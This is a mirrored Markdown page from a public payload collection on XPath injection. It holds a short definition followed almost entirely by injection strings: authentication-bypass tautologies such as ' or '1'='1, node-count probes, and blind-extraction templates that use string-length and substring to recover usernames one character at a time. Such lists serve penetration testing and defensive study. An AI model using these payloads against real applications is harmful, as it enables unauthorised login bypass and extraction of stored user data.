mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
36 lines
986 B
Markdown
36 lines
986 B
Markdown
|
# XPATH injection
|
|||
|
|
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
|
|||
|
|
|
|||
|
|
## Exploitation
|
|||
|
|
Similar to SQL : "string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"
|
|||
|
|
```
|
|||
|
|
' or '1'='1
|
|||
|
|
' or ''='
|
|||
|
|
x' or 1=1 or 'x'='y
|
|||
|
|
/
|
|||
|
|
//
|
|||
|
|
//*
|
|||
|
|
*/*
|
|||
|
|
@*
|
|||
|
|
count(/child::node())
|
|||
|
|
x' or name()='username' or 'x'='y
|
|||
|
|
' and count(/*)=1 and '1'='1
|
|||
|
|
' and count(/@*)=1 and '1'='1
|
|||
|
|
' and count(/comment())=1 and '1'='1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## Blind Exploitation
|
|||
|
|
```
|
|||
|
|
1. Size of a string
|
|||
|
|
and string-length(account)=SIZE_INT
|
|||
|
|
|
|||
|
|
2. Extract a character
|
|||
|
|
substring(//user[userid=5]/username,2,1)=CHAR_HERE
|
|||
|
|
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
## Thanks to
|
|||
|
|
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
|||
|
|
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|